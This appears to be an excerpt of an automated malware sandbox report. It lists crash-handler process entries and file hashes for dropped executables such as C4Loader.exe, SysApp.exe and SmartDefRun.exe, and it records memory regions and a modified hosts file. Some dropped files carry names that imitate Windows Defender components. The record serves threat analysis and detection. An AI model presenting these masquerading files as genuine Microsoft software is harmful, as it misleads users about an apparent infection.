C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1816 -s 5002⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4520 -s 4922⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3956 -s 5002⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4168 -s 4682⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4748 -s 5042⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 224 -s 4242⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1272 -s 4522⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3556 -s 4522⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1332 -s 3682⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1312 -s 4282⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2868 -s 4242⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4184 -s 2362⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4368 -s 4882⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3408 -s 2281⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5036 -s 4921⤵
- Program crash
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Libs\g.logFilesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exeFilesize
3.7MB
MD5e2fb72e358e13e40ae8327c3a9df8165
SHA1b40aceed9393e3d4c289b2cf477dd5dee76a39da
SHA256d6516a119c2c08859883d95f97b0bd4b2fb8fbad7d7fae6ed2d79b447177d408
SHA512b209805a5194ccf70a97a57685a1765bb1ef15480994a2737084805fa21f79a285a5a1f98d0857051bc03ad98a2c90d81b33bb49cde1e955ba9898e86d8697e9
-
C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exeFilesize
3.7MB
MD5e2fb72e358e13e40ae8327c3a9df8165
SHA1b40aceed9393e3d4c289b2cf477dd5dee76a39da
SHA256d6516a119c2c08859883d95f97b0bd4b2fb8fbad7d7fae6ed2d79b447177d408
SHA512b209805a5194ccf70a97a57685a1765bb1ef15480994a2737084805fa21f79a285a5a1f98d0857051bc03ad98a2c90d81b33bb49cde1e955ba9898e86d8697e9
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6CA4.tmp.csvFilesize
38KB
MD5bd14293f6b4ffca0c527274d97d7360f
SHA1cb2bfb09701e7e7e1c71cc8ad73ca88b4768c734
SHA25602adaa4b5dfc11c3bbf620e866924cad93512226c5558098979872df5e3fdf99
SHA51206d006fb3f38104aae70917a32233a6a9bed6fedd85c0c1e5f6a5f45d122127bae5429267028c6a73fc6902edde8d75d087dd4558f8ee5fb6280e395b887d4aa
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6D31.tmp.txtFilesize
13KB
MD5104619a07967f223a99cc8c25a0f7664
SHA1e8e33ad964c2d4cf91d1cae8b26b13dc24d981bc
SHA25634b61e7d472e7aa60adb2ba780fa432492210ba42d699c7fb3781dd190cfbc47
SHA512de63836a6d85c0efca840ef4351f668649a28753f1e0524eb5d5578c8da81e4aec57502f3870a9fd4befe8453d6443f230bce8c84be4d45d50733f40ece52c62
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6DFD.tmp.csvFilesize
38KB
MD57b52d187d29de1df11b661db92639b8c
SHA1a9e6310058f5c84020498958154c7c71bdfeda6a
SHA25687e19fd9e4726dcb934b94b75022b08836b193eeb4e89e647c1cb991a799ccef
SHA512aa662496089546269bb812642c5e41cf6962b950cd49aff99d7de5afc8db809c487a319a95247b2379407933d118305f59b808ba409643f198ba44d43e31e3f6
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6E6C.tmp.txtFilesize
13KB
MD5f8763dc37112f78496d4078309d35924
SHA1e6b13f7ec04a376f3e5ee241cf4609a020823dcd
SHA2564cf47508a1cc4eb121264e949391b754b022ecd0811c77ae9c2d42fdf1a038cf
SHA512384a498ded0229662ae1cbcff708f79f6b5224ca36a57327804c6872f2def503e7f7c8ca6386e494663bcd355f56f5d27b9d4738f2d4db7f4f841c14f4326162
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER889C.tmp.csvFilesize
35KB
MD5b71137a9aa7dae34c6268190beb9a88b
SHA1fce221e47c32c670a8956d2a30475b37051bff81
SHA256753bec6011ee9d96734cab83a650a824fb9651800db9f2fbd0de74762c9c6ba1
SHA5127a480c7f8d69d7229b4eb6cb4456f959150c7ea1c89eb1adfde9a2d038f8886d28945da2777cea68d449264b23bd748994429dfaefac046ee75b33715b01213d
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER88DB.tmp.txtFilesize
13KB
MD516457ddba7b2360a4c5888d3a66dd4a4
SHA14577d783c5beaed4d15ce2d6c237f9c309c492fb
SHA25628d983615c9f29b6627b5f0208bbb257f1a2ead0066e38331e4e57648e5f62a1
SHA512689d77b2dcbc219f4c0e995b5697f169cc3bb2c51f6f68756a7b2c43e4d705722886fd551a892e0e56029c1f7faed006886c05363a9c6175993c00e2fe641d8d
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER903F.tmp.csvFilesize
35KB
MD55bb8b5ea2a17b25b70043ac2d2f83853
SHA1f887574f104d45a22e6a3958134e3d4647f4c7cb
SHA2565dd7ac57e4e8458fa578d33cf1a95058be796dd144f5418f92b834083002cc7b
SHA51248eaa8fdff88132035652602c68c79debe1a99f18eefc3507e870ca7ea0207c74415783725107d2172757d93048fada6c7f3f04fdad9eb97183e2bc61d983976
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER906F.tmp.txtFilesize
13KB
MD5eae9799445b5d35f6a95816bf899c0df
SHA19189507ad87c9eac4a215f62e57b429d3960cd66
SHA2560e101de44b8b684e436ce067e0ebba7c4f727f13bc8923018cfb484378391105
SHA512314900754fec3c1537884d4fab05641d1ea64320fd28b76207eaf2ecd0e60a652a470d183f53f61843ab00e2370f3c23b096bfaebdbb60811ccf9525266ffd8b
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER97A4.tmp.csvFilesize
35KB
MD569d4e338778eee6224cee4ddaf1608ab
SHA1bc343f9c87acf1b18ab7dfce2701db5f719d870e
SHA256896e9e277da2f54c44d0e14ffe7ea3f07e0944ec89617f2e82b883e99813cad6
SHA51225d2778cd643ae2dafebebd611a4bee4e2d611fc102039af547001a664aa9316f53187b9d14f18d3cbad63d9c22a94382f5daa2f5c25995b056b493aa98faad4
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER97F3.tmp.txtFilesize
13KB
MD5326db9c91eac2505ed9589a3ae33c79e
SHA101cab51f8318f4201b0e88200d52e211d00e025e
SHA256d32acaae676db5ea896e52efb27cc2724a0347d57f077bf83c45fcc5b2854817
SHA5125648a2877e921ec6ffb3ecbbbe2594e73b34a5b7dc4313e8c904b1ea01a641f050d4f2b80cdc41d903d0ec8f7af4f0d6f661cf3bd6bf1ea0a3d59915534d0063
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9F66.tmp.csvFilesize
35KB
MD539e5f596dca1ad8e6d40649e5f6d6597
SHA16478804601c1e2921f169d720c6728c014e9c46b
SHA2569a1c74261f2d2b0bee3ff184f93de627707861f4643419363c74b61b76c25060
SHA5121d126ebf407d9b615db8fde76c52ea8b88ceed71e26d10c87045b571aa5e4e2a4b9c35f341fdf481988f80d46641d0bd1f9e08606b3dfa96741505829fc81437
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9F96.tmp.txtFilesize
13KB
MD54feb255b6696e750f57df015396359d1
SHA1c20c4445fc5a4caec0a94437149c8ba0be975924
SHA25699a6cd19b042a356af6005b8aff38bdcb6d4dac8a763574c0c2353f29ad7954e
SHA512a7215da614878f53311b6078955e6999595535f54f1dc270aef5b967304478210a38e52377d696bec70a6b22ab50f1725f531463bd0da75863a4dba0c12df91d
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERA4B7.tmp.csvFilesize
35KB
MD54185777da7c417ed03ceb5bf8d39ef56
SHA1c12a5bac28d7c3bc45b8cf57a2b1fbbf35e67f12
SHA2566b38d993da61fdef619068ab20e0aad4484c3cdbde8fc29cba2d7fb54911ed18
SHA512d8147149694474600c57ee29c565542659d33e108ffe9e1e40e8f3862c0360684e5145111e6a8732da1bff00ab94f57ecf0f7c5e1df5c2952583d82818d949e2
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERA535.tmp.txtFilesize
13KB
MD5c0ffc0b8b12ad711e764bb801c50cf58
SHA10c7be709113690b6cef23a387c9499ba032828e8
SHA256d03886bd172937a573d1fabb55a729d57e487c7c7d667bbf64d35ed286c43d4e
SHA5121f851b5298655350b897e324d6282967fcd108b57ab80cbae9446919989e57288543bf8601cb07e161f87501622bf13a11a1732de8c51ff268ee9d3c6bdb8dbe
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERAF68.tmp.csvFilesize
35KB
MD590a8bf80178a5bf5b8028c2bc68253b0
SHA1eeeca6078290e5f5b66d705bbd50df4c2478a551
SHA25607d5afa3cd14ecbb53c265ca56452fba4786cc3977a97193105f89aef5dd5e04
SHA512c4d9046d5a733c6b70be4c7e3243ca1bc0f8b94ebaee1710168a3c3055dfb8d0608b76c084ff29ffd62480b385786c7dba666b0196da0ad36754a989e595030f
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERAFA7.tmp.txtFilesize
13KB
MD5c1a8fa3e3caf143a4e89d105aa9e06e1
SHA1fd6105a1790b285be7535f5a81b79ea1a518cd4e
SHA256da5be99169376ac62e329ea67cd2c1fb8f1b7d5bce625fc9def74974154cb375
SHA51243c528ae8f8eaeadbcabe682c47a61a251f6fa5c969feabb830de27f917f4c81c206afe40fc1d131eb84f3f05fa5708ddc0249a4a95e285949fac45a84eb0021
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB620.tmp.csvFilesize
35KB
MD50904024a228c475828edc51d71134e12
SHA10fcf08442d077f6af0a6b6d77b9a2d561d1c1f46
SHA2562811c55dbfad013ddfe62126fc0d3f8b2b734fe586f82f8efa654b395d11600b
SHA5129f80c07e149b468aa27d9cb066734404d9e46ab6747b8da69311521a4d86d9f3ebd93cad3b3236bd4a3da34f852a64287a80c0a23370cd9377764c9d8696902a
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB67F.tmp.txtFilesize
13KB
MD5d677e5fa7885830241752bcb36924b06
SHA1af8f3a968208a72c1ede3420a95e43d035e5952a
SHA256fda31a377f81d009217126e923fc7e656239ca60e51bc6da82bddc24113a2c21
SHA5125876e07f5cb5a501dd8b393ea504196eb852a1ef49770604eb83fdf936944769fd829883bfd24e7ce7bebb35d7ef3201737d840471f5e96020b45c8f5a1c644f
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERBD18.tmp.csvFilesize
35KB
MD598cec8b8acd64795d713e12b1ce12e8d
SHA1e719ea30bf173b29396ffd757abe1cc1ead23145
SHA2563cdbbf1193dcf2848fc9601e1eade0d74c68e75210ca085079b95cf8b2851ebc
SHA5129c265b1389e3592bc033cf6833b0267e8d3b7071f5ebb42832becc3da9195d16360cfe42dc2c775036fb032823f5a58e209a3fd3a5bef0422666c269ca57b999
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERBD76.tmp.txtFilesize
13KB
MD50b4b7166a4fa9b62970c4eabd71aa962
SHA1d344171e1b7049bbbdc6189d3948f235ff05fb37
SHA2560663a195dfbba139c73bd9227ff16ebfef5eae6e145ccfb138348357fb37c77d
SHA51299f41edf0f9271343a42531ef76a406f3ed544631c2fe75d405847e88b21a8a6c95d53c90ad431a07a24a17460bff9ae63af958c6759d1eb49ac77927521f32a
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC43E.tmp.csvFilesize
35KB
MD59f2c766cdbb9aafe4de37cdad47d2de1
SHA1d06a79f04f84832449c58b3da3d072e7e88eea34
SHA256a953001bddaee64067d4c2668eab5e92306166f623beb2df3c525b9b7317eddd
SHA512e9f2c826a0f5a84a20ef4f7c75a8ba363565974844f15a2a17f0e0473b2ebdff2a149397eccddb44c703267ae62090124cb741d4933c097da891d934346a2868
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC48D.tmp.txtFilesize
13KB
MD54fc4ca963a1ebe67323faca08b2e8d8b
SHA1824f7b8663f66ce24aef19cc8397ec467d9ff015
SHA256fd4c63e9ba1742548ec52ac9229d556ddbea01362fd67bada21e11a7372645d2
SHA512f6bc30c48ff4ad906a188f4699fad8c3bab39d676917f7181c699631d6466ae3d89f75c0d305060e9e5949b74985d540a560e9a9a2f610472f6eb4b1ed49d391
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
19KB
MD5a52bfac7c3f992de8d884ca6f4498777
SHA10d98c788f2973153c0d1d2553bee7760d1dadcb5
SHA256cf296b268819485427f4310a31c9ebfc09e75e211989f7833246db0ad57cf657
SHA5127c335a49c7b6248fe6526a5e0cd093d903157e18e63382593285bb8bf2ac1f11e49d4a46b60af222aecbc09931bbf6c65d3a38283873394294f090d54903cda9
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
948B
MD5a7ce8cefc3f798abe5abd683d0ef26dd
SHA1b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e
SHA2565e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a
SHA512c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5d0f3eff52698c0eab8a2c8bd1d9f7c18
SHA14292ae775443749c6c2281dac800d86b4bdde07e
SHA256b16c74cbb71b5ba7bbf32696feb6869d9a0fa3bac42042a3fe8f3d48e2d5dbf6
SHA512642b5d51a4cec6094e6789f29eb68885068583a08e102606b7ed2ace036cacd8b3bc428cef6f8cbfaadf5644fe52149211f7fc6774fc4ff458bd76cfae703cfd
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exeFilesize
2.7MB
MD543a0526a928f9daca9c953221406af8e
SHA134fdd0d94ecfe8c887ebb164068579013d2c611b
SHA25688e1fbd4e5494e3c2766300e8bab97edb08f3c7315c3d914b7d8b2dac25f8986
SHA5129632a96172d6db2d7b0e356a2bb661b397b3c8b380fbe151707322d204cee0ab82abbec4476ce6e43f5dfa67b9ae34d77909fbc966d431898b25dec9fbaea3fd
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exeFilesize
2.7MB
MD543a0526a928f9daca9c953221406af8e
SHA134fdd0d94ecfe8c887ebb164068579013d2c611b
SHA25688e1fbd4e5494e3c2766300e8bab97edb08f3c7315c3d914b7d8b2dac25f8986
SHA5129632a96172d6db2d7b0e356a2bb661b397b3c8b380fbe151707322d204cee0ab82abbec4476ce6e43f5dfa67b9ae34d77909fbc966d431898b25dec9fbaea3fd
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exeFilesize
3.7MB
MD5e2fb72e358e13e40ae8327c3a9df8165
SHA1b40aceed9393e3d4c289b2cf477dd5dee76a39da
SHA256d6516a119c2c08859883d95f97b0bd4b2fb8fbad7d7fae6ed2d79b447177d408
SHA512b209805a5194ccf70a97a57685a1765bb1ef15480994a2737084805fa21f79a285a5a1f98d0857051bc03ad98a2c90d81b33bb49cde1e955ba9898e86d8697e9
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exeFilesize
3.7MB
MD5e2fb72e358e13e40ae8327c3a9df8165
SHA1b40aceed9393e3d4c289b2cf477dd5dee76a39da
SHA256d6516a119c2c08859883d95f97b0bd4b2fb8fbad7d7fae6ed2d79b447177d408
SHA512b209805a5194ccf70a97a57685a1765bb1ef15480994a2737084805fa21f79a285a5a1f98d0857051bc03ad98a2c90d81b33bb49cde1e955ba9898e86d8697e9
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exeFilesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exeFilesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
C:\Users\Admin\AppData\Local\Temp\new2.exeFilesize
674KB
MD525efca5920d6608517e68c85a932ed7f
SHA104421b033c3ba1fed354e2a36503d8b192083979
SHA256a6ab90d5445d7ff822f3d9401ab6c438e624d416575d68be8eb4336f3c41c9dd
SHA512917d0ec98166454eb13d3e40a8ff6c2fc0f0a793896663b8905828162e42d821eebd38ac520429f0e3bec58df1cfb287a28545983437b1405b6721e048f5ddec
-
C:\Users\Admin\AppData\Local\Temp\new2.exeFilesize
674KB
MD525efca5920d6608517e68c85a932ed7f
SHA104421b033c3ba1fed354e2a36503d8b192083979
SHA256a6ab90d5445d7ff822f3d9401ab6c438e624d416575d68be8eb4336f3c41c9dd
SHA512917d0ec98166454eb13d3e40a8ff6c2fc0f0a793896663b8905828162e42d821eebd38ac520429f0e3bec58df1cfb287a28545983437b1405b6721e048f5ddec
-
C:\Windows\System32\drivers\etc\hostsFilesize
2KB
MD54ac8a26e2cee1347880edccb47ab30ea
SHA1a629f6d453014c9dccb98987e1f4b0a3d4bdd460
SHA256de574c85b289f23bba4b932a4c48397c4c61904cb6df086726dd7f8049624c3a
SHA512fc2af80b2e84ae114ae06144b9ec41eed50250e20f18db3d114ac8d2c59ebbfcd440f59d12f173ea6a94bcf394b0cecee9e120265112b7043bf9e2bd636d6a8a
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5b42c70c1dbf0d1d477ec86902db9e986
SHA11d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA2568ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA51257fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5aa187cac09f051e24146ad549a0f08a6
SHA12ef7fae3652bb838766627fa6584a6e3b5e74ff3
SHA2567036d1846c9dc18e19b6391a8bcfbb110006c35791673f05ebf378d7c16c6d5f
SHA512960f07a7f2699121c23ecdb1429e39b14485957b41ff9d201c737d1675f2d4cd97d4a3de4bce4fb18155c14183b96b2689a36df94297dba035eef640136b0df2
-
memory/344-265-0x00007FFA11CD0000-0x00007FFA11EC5000-memory.dmpFilesize
2.0MB
-
memory/344-253-0x00007FF9F2FF0000-0x00007FF9F3AB1000-memory.dmpFilesize
10.8MB
-
memory/344-214-0x00007FF9F2FF0000-0x00007FF9F3AB1000-memory.dmpFilesize
10.8MB
-
memory/344-258-0x00007FFA104F0000-0x00007FFA105AE000-memory.dmpFilesize
760KB
-
memory/344-257-0x00007FFA11CD0000-0x00007FFA11EC5000-memory.dmpFilesize
2.0MB
-
memory/344-266-0x00007FFA104F0000-0x00007FFA105AE000-memory.dmpFilesize
760KB
-
memory/424-276-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/428-275-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/576-269-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/656-270-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/760-242-0x00007FF9F2FF0000-0x00007FF9F3AB1000-memory.dmpFilesize
10.8MB
-
memory/760-241-0x0000022DAE5F9000-0x0000022DAE5FF000-memory.dmpFilesize
24KB
-
memory/760-243-0x0000022DAE5F9000-0x0000022DAE5FF000-memory.dmpFilesize
24KB
-
memory/760-234-0x00007FF9F2FF0000-0x00007FF9F3AB1000-memory.dmpFilesize
10.8MB
-
memory/856-232-0x0000000000000000-mapping.dmp
-
memory/904-221-0x000001B03AEB0000-0x000001B03AEB6000-memory.dmpFilesize
24KB
-
memory/904-222-0x000001B03AEC0000-0x000001B03AECA000-memory.dmpFilesize
40KB
-
memory/904-223-0x00007FF9F2FF0000-0x00007FF9F3AB1000-memory.dmpFilesize
10.8MB
-
memory/904-220-0x000001B039E80000-0x000001B039E88000-memory.dmpFilesize
32KB
-
memory/904-219-0x000001B03AED0000-0x000001B03AEEA000-memory.dmpFilesize
104KB
-
memory/904-218-0x000001B039E70000-0x000001B039E7A000-memory.dmpFilesize
40KB
-
memory/904-217-0x000001B039E90000-0x000001B039EAC000-memory.dmpFilesize
112KB
-
memory/904-216-0x000001B039E60000-0x000001B039E6A000-memory.dmpFilesize
40KB
-
memory/904-215-0x000001B039E40000-0x000001B039E5C000-memory.dmpFilesize
112KB
-
memory/904-213-0x00007FF9F2FF0000-0x00007FF9F3AB1000-memory.dmpFilesize
10.8MB
-
memory/940-277-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/944-274-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/952-490-0x0000000000000000-mapping.dmp
-
memory/1008-278-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/1020-271-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/1112-279-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/1180-280-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/1252-281-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/1316-282-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/1336-283-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/1376-284-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/1392-285-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/1492-230-0x0000000000000000-mapping.dmp
-
memory/1496-286-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/1520-331-0x0000000000000000-mapping.dmp
-
memory/1552-287-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/1560-288-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/1624-289-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/1636-290-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/1648-514-0x0000000000000000-mapping.dmp
-
memory/1652-427-0x0000000000000000-mapping.dmp
-
memory/1700-291-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/1732-298-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/1764-447-0x0000000000000000-mapping.dmp
-
memory/1788-292-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/1820-293-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/1836-457-0x0000000000000000-mapping.dmp
-
memory/1912-294-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/1920-295-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/1972-533-0x0000000000000000-mapping.dmp
-
memory/1980-236-0x0000000000000000-mapping.dmp
-
memory/1988-185-0x0000000000000000-mapping.dmp
-
memory/2004-296-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/2012-297-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/2032-171-0x0000000000000000-mapping.dmp
-
memory/2040-192-0x00007FF9F2ED0000-0x00007FF9F3991000-memory.dmpFilesize
10.8MB
-
memory/2040-181-0x00007FF9F2ED0000-0x00007FF9F3991000-memory.dmpFilesize
10.8MB
-
memory/2108-187-0x0000000000000000-mapping.dmp
-
memory/2112-299-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/2136-465-0x0000000000000000-mapping.dmp
-
memory/2212-165-0x00000000000A0000-0x0000000000354000-memory.dmpFilesize
2.7MB
-
memory/2212-170-0x0000000004CE0000-0x0000000004D72000-memory.dmpFilesize
584KB
-
memory/2212-207-0x00000000074B0000-0x00000000074EC000-memory.dmpFilesize
240KB
-
memory/2212-173-0x0000000005030000-0x000000000503A000-memory.dmpFilesize
40KB
-
memory/2212-160-0x0000000000000000-mapping.dmp
-
